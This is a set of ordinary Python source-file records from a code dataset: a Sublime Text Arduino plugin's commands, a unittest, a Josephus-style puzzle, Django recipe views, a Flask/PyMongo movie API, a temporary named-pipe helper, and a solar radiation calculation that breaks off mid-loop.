stino.cur_language.translate(display_text)\n\t\t\t\tmsg = msg.replace('{1}', filename)\n\t\t\t\tstino.log_panel.addText(msg)\n\t\t\telse:\n\t\t\t\tstino.src.createNewFile(self.window, new_file_path)\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass ImportLibraryCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tview = self.window.active_view()\n\t\t(library, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\tlibrary_path = stino.arduino_info.getLibraryPath(platform, library)\n\t\tif os.path.isdir(library_path):\n\t\t\tstino.src.insertLibraries(library_path, view)\n\t\telse:\n\t\t\tdisplay_text = 'The selected library no longer exists.\\nYou may need to restart Sublime Text 2\\nto update the import library menu.\\n'\n\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\tstino.log_panel.addText(msg)\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass ShowSketchFolderCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tfilename = self.window.active_view().file_name()\n\t\tif filename:\n\t\t\t# sketch_folder_path = stino.src.getSketchFolderPath(filename)\n\t\t\tsketch_folder_path = os.path.split(filename)[0]\n\t\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':[sketch_folder_path], \\\n\t\t\t\t'condition_mod':'osfile', 'condition_func':'isFile', 'function_mod':'osfile', \\\n\t\t\t\t'function_func':'openFile'})\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass ChangeExtraFlagsCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tcaption = '%(Extra compilation flags:)s'\n\t\tcaption = caption % stino.cur_language.getTransDict()\n\t\textra_flags = stino.const.settings.get('extra_flags')\n\t\tif (not extra_flags) or (len(extra_flags) < 2):\n\t\t\textra_flags = '-D'\n\t\tself.window.show_input_panel(caption, extra_flags, self.on_done, None, None)\n\n\tdef on_done(self, input_text):\n\t\textra_flags = input_text\n\t\tif (not extra_flags) or (len(extra_flags) < 3):\n\t\t\textra_flags = ''\n\t\tstino.const.settings.set('extra_flags', extra_flags)\n\n\tdef description(self):\n\t\textra_flags = stino.const.settings.get('extra_flags')\n\t\tif (not extra_flags) or (len(extra_flags) < 2):\n\t\t\tcaption = '%(Add_Extra_Flags)s'\n\t\telse:\n\t\t\tcaption = '%(Change_Extra_Flags)s'\n\t\tcaption = caption % stino.cur_language.getTransDict()\n\t\treturn caption\n\nclass CompileSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.active_view().run_command('save')\n\t\tfilename = self.window.active_view().file_name()\n\t\tcur_compilation = stino.compilation.Compilation(stino.cur_language, stino.arduino_info, \\\n\t\t\tstino.cur_menu, filename)\n\t\tcur_compilation.start()\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass UploadBinaryCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.active_view().run_command('save')\n\t\tfilename = self.window.active_view().file_name()\n\t\tcur_upload = stino.compilation.Upload(stino.cur_language, stino.arduino_info, stino.cur_menu, \\\n\t\t\tfilename, serial_port_in_use_list = stino.serial_port_in_use_list, \\\n\t\t\tserial_port_monitor_dict = stino.serial_port_monitor_dict)\n\t\tcur_upload.start()\n\n\tdef is_enabled(self):\n\t\tstate = True\n\t\tplatform = stino.const.settings.get('platform')\n\t\tif 'AVR' in platform:\n\t\t\tserial_port_list = stino.smonitor.genSerialPortList()\n\t\t\tif not serial_port_list:\n\t\t\t\tstate = False\n\t\tshow_state = stino.const.settings.get('show_arduino_menu', False)\n\t\tstate = state and show_state\n\t\treturn state\n\nclass UploadUsingProgrammerCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.active_view().run_command('save')\n\t\tfilename = self.window.active_view().file_name()\n\t\tcur_upload = stino.compilation.Upload(stino.cur_language, stino.arduino_info, \\\n\t\t\tstino.cur_menu, filename, mode = 'upload_using_programmer')\n\t\tcur_upload.start()\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tplatform = stino.const.settings.get('platform')\n\t\tprogrammer_lists = stino.arduino_info.getProgrammerLists(platform)\n\t\tif programmer_lists:\n\t\t\tstate = True\n\t\tshow_state = stino.const.settings.get('show_arduino_menu', False)\n\t\tstate = state and show_state\n\t\treturn state\n\nclass SelectBoardCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t(board, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\tpre_platform = stino.const.settings.get('platform')\n\t\tpre_board = stino.const.settings.get('board')\n\t\tif platform != pre_platform or board != pre_board:\n\t\t\tstino.const.settings.set('platform', platform)\n\t\t\tstino.const.settings.set('board', board)\n\t\t\tstino.const.settings.set('full_compilation', True)\n\t\t\tstino.cur_menu.update()\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tplatform = stino.const.settings.get('platform')\n\t\tboard = stino.const.settings.get('board')\n\t\tboard_platform = stino.utils.genKey(board, platform)\n\t\tif menu_str == board_platform:\n\t\t\tstate = True\n\t\treturn state\n\nclass SelectBoardTypeCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t(item, board_type, board, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\ttype_caption = stino.arduino_info.getPlatformTypeCaption(platform, board_type)\n\t\tpre_item = stino.const.settings.get(type_caption)\n\t\tif not item == pre_item:\n\t\t\tstino.const.settings.set(type_caption, item)\n\t\t\tstino.const.settings.set('full_compilation', True)\n\t\t\tstino.cur_menu.commandUpdate()\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\t(item, board_type, board, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\ttype_caption = stino.arduino_info.getPlatformTypeCaption(platform, board_type)\n\t\tpre_item = stino.const.settings.get(type_caption)\n\t\tif item == pre_item:\n\t\t\tstate = True\n\t\treturn state\n\nclass SelectSerialPortCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tserial_port = menu_str\n\t\tpre_serial_port = stino.const.settings.get('serial_port')\n\t\tif serial_port != pre_serial_port:\n\t\t\tstino.const.settings.set('serial_port', serial_port)\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tserial_port = stino.const.settings.get('serial_port')\n\t\tif menu_str == serial_port:\n\t\t\tstate = True\n\t\treturn state\n\nclass SelectBaudrateCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tbaudrate = menu_str\n\t\tpre_baudrate = stino.const.settings.get('baudrate')\n\t\tif baudrate != pre_baudrate:\n\t\t\tstino.const.settings.set('baudrate', baudrate)\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tbaudrate = stino.const.settings.get('baudrate')\n\t\tif menu_str == baudrate:\n\t\t\tstate = True\n\t\treturn state\n\nclass StartSerialMonitorCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tserial_port = stino.const.settings.get('serial_port')\n\t\tif not serial_port in stino.serial_port_in_use_list:\n\t\t\tserial_monitor = stino.smonitor.SerialMonitor(serial_port)\n\t\t\tstino.serial_port_in_use_list.append(serial_port)\n\t\t\tstino.serial_port_monitor_dict[serial_port] = serial_monitor\n\t\telse:\n\t\t\tserial_monitor = stino.serial_port_monitor_dict[serial_port]\n\t\tserial_monitor.start()\n\t\tself.window.run_command('send_to_serial')\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tserial_port = stino.const.settings.get('serial_port')\n\t\tserial_port_list = stino.smonitor.genSerialPortList()\n\t\tif serial_port in serial_port_list:\n\t\t\t# if stino.smonitor.isSerialPortAvailable(serial_port):\n\t\t\tstate = True\n\t\treturn state\n\nclass StopSerialMonitorCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tname = self.window.active_view().name()\n\t\tserial_port = name.split('-')[1].strip()\n\t\tserial_monitor = stino.serial_port_monitor_dict[serial_port]\n\t\tserial_monitor.stop()\n\t\tif serial_port in stino.serial_port_in_use_list:\n\t\t\tstino.serial_port_in_use_list.remove(serial_port)\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tview = self.window.active_view()\n\t\tif stino.smonitor.isMonitorView(view):\n\t\t\tname = view.name()\n\t\t\tserial_port = name.split('-')[1].strip()\n\t\t\tserial_port_list = stino.serial_port_in_use_list\n\t\t\tif serial_port in serial_port_list:\n\t\t\t\tstate = True\n\t\treturn state\n\nclass SendToSerialCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tcaption = '%(Send)s'\n\t\tself.caption = caption % stino.cur_language.getTransDict()\n\t\tself.window.show_input_panel(self.caption, '', self.on_done, None, None)\n\t\t\n\tdef on_done(self, input_text):\n\t\tif input_text:\n\t\t\tview = self.window.active_view()\n\t\t\tif stino.smonitor.isMonitorView(view):\n\t\t\t\tname = view.name()\n\t\t\t\tserial_port = name.split('-')[1].strip()\n\t\t\t\tif serial_port in stino.serial_port_in_use_list:\n\t\t\t\t\tserial_monitor = stino.serial_port_monitor_dict[serial_port]\n\t\t\t\t\tserial_monitor.send(input_text)\n\t\t\t\t\tself.window.show_input_panel(self.caption, '', self.on_done, None, None)\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tview = self.window.active_view()\n\t\tif stino.smonitor.isMonitorView(view):\n\t\t\tname = view.name()\n\t\t\tserial_port = name.split('-')[1].strip()\n\t\t\tserial_port_list = stino.serial_port_in_use_list\n\t\t\tif serial_port in serial_port_list:\n\t\t\t\tstate = True\n\t\treturn state\n\nclass SelectProgrammerCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t(programmer, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\tpre_platform = stino.const.settings.get('platform')\n\t\tpre_programmer = stino.const.settings.get('programmer')\n\t\tif platform != pre_platform or programmer != pre_programmer:\n\t\t\tstino.const.settings.set('programmer', programmer)\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tplatform = stino.const.settings.get('platform')\n\t\tprogrammer = stino.const.settings.get('programmer')\n\t\tprogrammer_platform = stino.utils.genKey(programmer, platform)\n\t\tif menu_str == programmer_platform:\n\t\t\tstate = True\n\t\treturn state\n\nclass BurnBootloaderCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.active_view().run_command('save')\n\t\tfilename = self.window.active_view().file_name()\n\t\tcur_burn = stino.compilation.BurnBootloader(stino.cur_language, stino.arduino_info, stino.cur_menu, filename)\n\t\tcur_burn.start()\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tplatform = stino.const.settings.get('platform')\n\t\tprogrammer_lists = stino.arduino_info.getProgrammerLists(platform)\n\t\tif programmer_lists:\n\t\t\tstate = True\n\t\tshow_state = stino.const.settings.get('show_arduino_menu', False)\n\t\tstate = state and show_state\n\t\treturn state\n\nclass SelectLanguageCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tlanguage = stino.cur_language.getLanguageFromLanguageText(menu_str)\n\t\tpre_language = stino.const.settings.get('language')\n\t\tif language != pre_language:\n\t\t\tstino.const.settings.set('language', language)\n\t\t\tstino.cur_language.update()\n\t\t\tstino.cur_menu.languageUpdate()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tsetting_language = stino.const.settings.get('language')\n\t\tcur_language = stino.cur_language.getLanguageFromLanguageText(menu_str)\n\t\tif cur_language == setting_language:\n\t\t\tstate = True\n\t\treturn state\n\nclass ToggleGlobalSettingCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tglobal_setting = not stino.const.settings.get('global_setting')\n\t\tstino.const.settings.set('global_setting', global_setting)\n\t\tif not global_setting:\n\t\t\tfile_path = self.window.active_view().file_name()\n\t\t\tsetting_folder_path = os.path.split(file_path)[0]\n\t\t\tstino.const.settings.changeSettingFileFolder(setting_folder_path)\n\t\tstino.const.settings.changeState(global_setting)\n\t\tstino.arduino_info.update()\n\t\tstino.cur_menu.fullUpdate()\n\t\tstino.status_info.update()\n\t\t\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('global_setting')\n\t\treturn state\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass SelectArduinoFolderCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tapp_root_list = stino.osfile.getAppRootList()\n\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':app_root_list, \\\n\t\t\t'condition_mod':'arduino', 'condition_func':'isArduinoRoot', 'function_mod':'actions', \\\n\t\t\t'function_func':'changeArduinoRoot', 'with_files': False})\n\nclass ChangeSketchbookFolderCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\thome_root_list = stino.osfile.getHomeRootList()\n\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':home_root_list, \\\n\t\t\t'condition_mod':'osfile', 'condition_func':'isButtonPress', 'function_mod':'actions', \\\n\t\t\t'function_func':'changeSketchbookRoot', 'with_files': False, 'with_button': True})\n\nclass ToggleFullCompilationCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tfull_compilation = not stino.const.settings.get('full_compilation')\n\t\tstino.const.settings.set('full_compilation', full_compilation)\n\t\tstino.cur_menu.commandUpdate()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('full_compilation')\n\t\treturn state\n\nclass ToggleVerboseCompilationCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tverbose_compilation = not stino.const.settings.get('verbose_compilation')\n\t\tstino.const.settings.set('verbose_compilation', verbose_compilation)\n\t\tstino.cur_menu.commandUpdate()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('verbose_compilation')\n\t\treturn state\n\nclass ToggleVerboseUploadCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tverbose_upload = not stino.const.settings.get('verbose_upload')\n\t\tstino.const.settings.set('verbose_upload', verbose_upload)\n\t\tstino.cur_menu.commandUpdate()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('verbose_upload')\n\t\treturn state\n\nclass ToggleVerifyCodeCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tverify_code = not stino.const.settings.get('verify_code')\n\t\tstino.const.settings.set('verify_code', verify_code)\n\t\tstino.cur_menu.commandUpdate()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('verify_code')\n\t\treturn state\n\nclass AutoFormatCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.run_command('reindent', {'single_line': False})\n\t\tdisplay_text = 'Auto Format finished.\\n'\n\t\tmsg = stino.cur_language.translate(display_text)\n\t\tstate = stino.log_panel.addText(msg)\n\nclass ArchiveSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tfilename = self.window.active_view().file_name()\n\t\tif filename:\n\t\t\tsketch_folder_path = stino.src.getSketchFolderPath(filename)\n\t\t\thome_root_list = stino.osfile.getHomeRootList()\n\t\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':home_root_list, \\\n\t\t\t\t'condition_mod':'osfile', 'condition_func':'isButtonPress', 'function_mod':'actions', \\\n\t\t\t\t'function_func':'getArchiveFolderPath', 'with_files': False, 'with_button': True, \\\n\t\t\t\t'extra_parameter': sketch_folder_path})\n\nclass FixEncodingCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tview = self.window.active_view()\n\t\tfilename = view.file_name()\n\t\tif filename:\n\t\t\tstate = True\n\t\t\tif view.is_dirty():\n\t\t\t\tdisplay_text = 'Discard all changes and reload sketch?\\n'\n\t\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\t\tstate = sublime.ok_cancel_dialog(msg)\n\t\t\n\t\t\tif state:\n\t\t\t\tcontent = stino.osfile.readFileText(filename)\n\t\t\t\tedit = view.begin_edit()\n\t\t\t\tview.replace(edit, sublime.Region(0, view.size()), content)\n\t\t\t\tview.end_edit(edit)\n\nclass OpenRefCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tstino.osfile.openUrl(menu_str)\n\nclass FindInReferenceCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tview = self.window.active_view()\n\t\tselected_text = stino.utils.getSelectedTextFromView(view)\n\t\tplatform = stino.const.settings.get('platform')\n\t\tkeyword_operator_list = stino.arduino_info.getOperatorList(platform)\n\t\tkeyword_list = stino.utils.getKeywordListFromText(selected_text, keyword_operator_list)\n\t\t(ref_list, msg_text) = stino.utils.getRefList(keyword_list, stino.arduino_info, platform)\n\t\tif ref_list:\n\t\t\tstino.osfile.openUrlList(ref_list)\n\t\tif msg_text:\n\t\t\tstino.log_panel.addText(msg_text)\n\t\tif not (ref_list or msg_text):\n\t\t\tdisplay_text = 'No reference available.\\n'\n\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\tstate = stino.log_panel.addText(msg)\n\nclass AboutStinoCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tdisplay_text = 'Stino'\n\t\tmsg = stino.cur_language.translate(display_text)\n\t\tsublime.message_dialog(msg)\n","sub_path":"Lib/Sublime Text 2/sublime-text-2/Backup/20140109131440/Arduino-like IDE/stcommands.py","file_name":"stcommands.py","file_ext":"py","file_size_in_byte":24071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"648398886","text":"import unittest\nimport data_in\n\n\nclass TestInputs(unittest.TestCase):\n\tdef test_name_is_string(self):\n\t\td = data_in.InputFiles.is_shapefile(['somestring'])\n\t\tself.assertIsInstance(d, str)\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"src/test_data_in.py","file_name":"test_data_in.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422980270","text":"# encoding:utf-8\r\n\r\nimport sys\r\n\r\ndef delete(n_p,A):\r\n list_people = []\r\n n_c = len(A)\r\n for i in range(n_p):\r\n list_people.append(i)\r\n count = 1 # 寻找k ,循环轮数,淘汰人数\r\n i = 0 # 计数开始的位置\r\n\r\n k = 0\r\n while(count < n_p):\r\n if list_people[i] != -1:\r\n k+=1\r\n if k==A[(count-1)%n_c]:\r\n list_people[i]=-1\r\n print(i)\r\n k=0\r\n count+=1\r\n i+=1\r\n if i==n_p:\r\n i=0\r\n for i in range(n_p):\r\n if list_people[i]!=-1:\r\n return i\r\n\r\nif __name__ == '__main__':\r\n N =int(sys.stdin.readline().strip())\r\n tests = []\r\n for i in range(N):\r\n line = sys.stdin.readline().strip().split()\r\n line = [ int(value) for value in line]\r\n tests.append(line)\r\n for line in tests:\r\n n_p = line[0]\r\n A = line[2:]\r\n print(delete(n_p,A))\r\n","sub_path":"Toutiao_bishi/count_03.py","file_name":"count_03.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392127503","text":"from django.db.models import Q\nfrom django.shortcuts import render\nfrom django.views.generic import View, ListView\nfrom google.cloud import storage\nfrom recetas.models import Receta\nimport datetime\nfrom django.conf import settings\n\n\nclass RecetasQueryset(object):\n def get_recetas_queryset(self, request):\n # Ordenamos por fecha de creación descendente y cogemos solo los 25 primeros\n recetas = Receta.objects.all().order_by('-fechaCreacion')[:25]\n\n return recetas\n\n\nclass HomeView(View, RecetasQueryset):\n def get(self, request):\n receta = self.get_recetas_queryset(request)\n\n client = storage.Client.from_service_account_json('key.json')\n bucket = client.get_bucket(settings.BUCKET_NAME)\n\n for rec in receta:\n blob = bucket.get_blob(settings.RECIPES_FOLDER_NAME + rec.nombreFoto)\n url = blob.generate_signed_url(\n expiration=datetime.timedelta(hours=1),\n method='GET'\n )\n\n rec.urlTemporalFoto = url\n\n context = {\n 'claseInicio': 'active',\n 'claseRecetasDe': '',\n 'claseTopRecetas': '',\n 'claseUserRecetas': '',\n 'claseCategorias_list': '',\n 'recetas_list': receta\n }\n\n return render(request, 'recetas/home.html', context)\n\n\nclass CategoriasListView(View):\n def get(self, request):\n context = {\n 'claseInicio': '',\n 'claseRecetasDe': '',\n 'claseTopRecetas': '',\n 'claseUserRecetas': '',\n 'claseCategorias_list': 'active'\n }\n\n return render(request, 'recetas/categorias.html', context)\n\n\nclass RecetasDeListView(View):\n def get(self, request):\n context = {\n 'claseInicio': '',\n 'claseRecetasDe': 'active',\n 'claseTopRecetas': '',\n 'claseUserRecetas': '',\n 'claseCategorias_list': ''\n }\n\n return render(request, 'recetas/recetasDe.html', context)\n\n\nclass UserRecetasView(View):\n def get(self, request):\n context = {\n 'claseInicio': '',\n 'claseRecetasDe': '',\n 'claseTopRecetas': '',\n 'claseUserRecetas': 'active',\n 'claseCategorias_list': ''\n }\n\n return render(request, 'recetas/user_recetas.html', context)\n\n\nclass TopRecetas(View):\n def get(self, request):\n context = {\n 'claseInicio': '',\n 'claseRecetasDe': '',\n 'claseTopRecetas': 'active',\n 'claseUserRecetas': '',\n 'claseCategorias_list': ''\n }\n\n return render(request, 'recetas/topRecetas.html', context)\n","sub_path":"recetas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"572587476","text":"def has_negatives(a):\n index = {}\n result = []\n\n for i in a:\n index[i] = i\n \n for i in index:\n # print(i, index[i])\n j = -i\n if j > 0 and j in index:\n result.append(j)\n\n return result\n\n\nif __name__ == \"__main__\":\n print(has_negatives([-1, -2, 1, 2, 3, 4, -4]))\n","sub_path":"hashtables/ex4/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"496835965","text":"from flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom flask_pymongo import PyMongo\n\napp = Flask(__name__)\n\napp.config['MONGO_DBNAME'] = 'imdb_data'\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/imdb_data'\n\nmongo = PyMongo(app)\n\n@app.route('/movie', methods=['GET'])\ndef get_all_movies():\n movies = mongo.db.movies_data\n output = []\n for movie in movies.find({}):\n output.append({\n 'movie_id' : movie['movie_id'],\n 'title' : movie['title'],\n 'year' : movie['year'],\n 'genres' : movie['genres'],\n 'imdb_rating' : movie['imdb_rating'],\n 'metascore' : movie['metascore'],\n 'directors_ids' : movie['directors_ids'],\n 'imdb_rating' : movie['imdb_rating'],\n 'runtime' : movie['runtime'],\n 'budget' : movie['budget'],\n 'countrys' : movie['countrys']\n })\n return jsonify({'result' : output})\n\n@app.route('/movie/', methods=['GET'])\ndef get_one_movie(id):\n movies = mongo.db.movies_data\n movie = movies.find_one_or_404({'movie_id' : id})\n output = {\n 'movie_id' : movie['movie_id'],\n 'title' : movie['title'],\n 'year' : movie['year'],\n 'genres' : movie['genres'],\n 'imdb_rating' : movie['imdb_rating'],\n 'metascore' : movie['metascore'],\n 'directors_ids' : movie['directors_ids'],\n 'imdb_rating' : movie['imdb_rating'],\n 'runtime' : movie['runtime'],\n 'budget' : movie['budget'],\n 'countrys' : movie['countrys']\n }\n return jsonify({'result' : output})\n\n@app.route('/director', methods=['GET'])\ndef get_all_directors():\n directors = mongo.db.directors_data\n output = []\n for director in directors.find({}):\n output.append({\n 'id' : director['id'],\n 'name' : director['name'],\n 'born_date' : director['born_date'],\n 'nationality' : director['nationality'],\n 'gender' : director['gender'],\n })\n return jsonify({'result' : output})\n\n@app.route('/director/', methods=['GET'])\ndef get_one_director(id):\n directors = mongo.db.directors_data\n director = directors.find_one_or_404({'id' : id})\n output = {\n 'id' : director['id'],\n 'name' : director['name'],\n 'born_date' : director['born_date'],\n 'nationality' : director['nationality'],\n 'gender' : director['gender'],\n }\n return jsonify({'result' : output})\n\nif __name__ == '__main__':\n app.run(host = '0.0.0.0', debug=True)\n","sub_path":"python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"225966070","text":"#===============================================================================\n# tempfifo.py\n#===============================================================================\n\n# Imports ======================================================================\n\nimport os\nimport tempfile\n\n\n\n\n# Classes ======================================================================\n\nclass NamedTemporaryFIFO():\n \"\"\"Create and return a temporary named pipe. The name of the pipe is\n accessible as the returned object's 'name' attribute. Can be used as a\n context manager. For example:\n \n with NamedTemporaryFIFO() as pipe:\n print(pipe.name)\n \n Upon exiting the context, the named pipe is removed unless the 'delete'\n parameter is set to False.\n\n Parameters\n ----------\n suffix : str or bytes\n as for tempfile.mkstemp\n prefix : sty or bytes\n as for tempfile.mkstemp\n dir : str or bytesq\n as for tempfile.mkstemp\n delete : bool\n whether the named pipe is deleted on exiting context (default True)\n open_read_end : bool\n whether the read end should be opened\n open_write_end : bool\n whetherthe write end should be opened\n\n Attributes\n ----------\n name : str\n filename of the temporary named pipe\n delete : bool\n whether the named pipe is deleted on exiting context (default True)\n read_end\n if open_read_end is True, the file descriptor of the read end of the\n pipe. Otherwise, None\n write_end\n if open_write_end is True, the file descriptor of the write end of the\n pipe. Otherwise, None\n \"\"\"\n\n def __init__(self, suffix=None, prefix=None, dir=None, delete: bool = True,\n open_read_end: bool = False, open_write_end: bool = False):\n with tempfile.NamedTemporaryFile(\n suffix=suffix, prefix=prefix, dir=dir\n ) as t:\n self.name = t.name\n self.delete = delete\n os.mkfifo(self.name)\n if open_read_end:\n self.read_end = os.open(self.name, os.O_RDONLY | os.O_NONBLOCK)\n else:\n self.read_end = None\n if open_write_end:\n self.write_end = os.open(self.name, os.O_WRONLY)\n else:\n self.write_end = None\n \n def __enter__(self):\n return self\n \n def __exit__(self, exc_type, exc_value, traceback):\n if self.read_end is not None:\n self.close_read_end()\n if self.write_end is not None:\n self.close_write_end()\n if self.delete:\n os.unlink(self.name)\n\n return False\n\n def close_read_end(self):\n \"\"\"Close the file descriptor representing the pipe's read end\n \"\"\"\n \n os.close(self.read_end)\n self.read_end = None\n \n def close_write_end(self):\n \"\"\"Close the file descriptor representing the pipe's write end\n \"\"\"\n\n os.close(self.write_end)\n self.write_end = None\n \n def close(self):\n \"\"\"Close the file descriptors representing both ends of the pipe\n \"\"\"\n\n self.close_read_end()\n self.close_write_end()\n","sub_path":"tempfifo/tempfifo.py","file_name":"tempfifo.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"212338738","text":"#!/usr/bin/env python\n \n#Serial version of solar energy calculations\n\n#Import modules\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import geopandas as gpd\nimport seaborn as sb\nimport time\n\n#Start timer\nstart_time = time.time();\n\n#Reading the excel data using pandas\ndata = np.array(pd.read_excel('solar_data.xlsx'));\n\n#Initializing the step operations by month and location\nmon = np.linspace(1,12,12,dtype=int);\nloc = np.linspace(0,236,237,dtype=int);\nst = np.linspace(0,49,50,dtype=int);\n\n#Parsing the latitude and state data\nlat = data[:,3];\nstate_raw = data[:,1];\n\n#Parsing the clearness index values\nKT = data[:,4:];\n\n#Useful constant\npi = np.pi;\ndtr = pi/180;\n\n#Matrix for land area of each state in sq. meters\narea = np.array([1477953,131171,134771,294207,403466,268431,12542,5047,138887,148959,16635,144669,214945,143793,92789,211754,102269,111898,20201,25142,79883,146435,206232,178040,121531,376962,125920,178711,198974,23187,19047,314161,284332,122057,105829,177660,248608,115883,2678,77857,196350,106798,676587,212818,102279,23871,172119,140268,62259,251470])*1000000;\n\n#Initializing the storage variables\nH_o_bar_loc = np.zeros((237,12));\nH_bar_loc = H_o_bar_loc;\nH_bar_state = np.zeros((50,12));\n\n#Beginning calculations by month by location\nfor i in mon:\n for j in loc:\n phi = lat[j];\n\n if i == 1:\n day = np.linspace(1,31,31);\n l = 31;\n elif i == 2:\n day = np.linspace(32,59,28);\n l = 28;\n elif i == 3:\n day = np.linspace(60,90,31);\n l = 31;\n elif i == 4:\n day = np.linspace(91,120,30);\n l = 30;\n elif i == 5:\n day = np.linspace(121,151,31);\n l = 31;\n elif i == 6:\n day = np.linspace(152,181,30);\n l = 30;\n elif i == 7:\n day = np.linspace(182,212,31);\n l = 31;\n elif i == 8:\n day = np.linspace(213,243,31);\n l = 31;\n elif i == 9:\n day = np.linspace(244,273,30);\n l = 30;\n elif i == 10:\n day = np.linspace(274,304,31);\n l = 31;\n elif i == 11:\n day = np.linspace(305,334,30);\n l = 30;\n else:\n day = np.linspace(335,365,31);\n l = 31;\n\n #Calculating the radiation on a horizontal surface for each day of the month\n H_o = np.linspace(0,l-1,l);\n a = 0; #step variable for storage\n for n in day:\n delta = 23.45 * np.sin(2*pi*(284+n)/365); #declination\n if -np.tan(phi*dtr)*np.tan(delta*dtr) > 1 or -np.tan(phi*dtr)*np.tan(delta*dtr) < -1:\n H_o[a] = 0;\n else:\n omega_s = np.degrees(np.arccos(-np.tan(phi*dtr)*np.tan(delta*dtr))); #sunset hour angle\n H_o[a] = (24*3600*1367/pi) * (1+0.033*np.cos(2*pi*n/365)) * ((np.cos(phi*dtr)*np.cos(delta*dtr)*np.sin(omega_s*dtr))+(omega_s*dtr*np.sin(phi*dtr)*np.sin(delta*dtr))); #radiation on a horizontal surface outside the Earth's atmosphere\n a = a + 1;\n\n #Take the daily average for the month and save\n 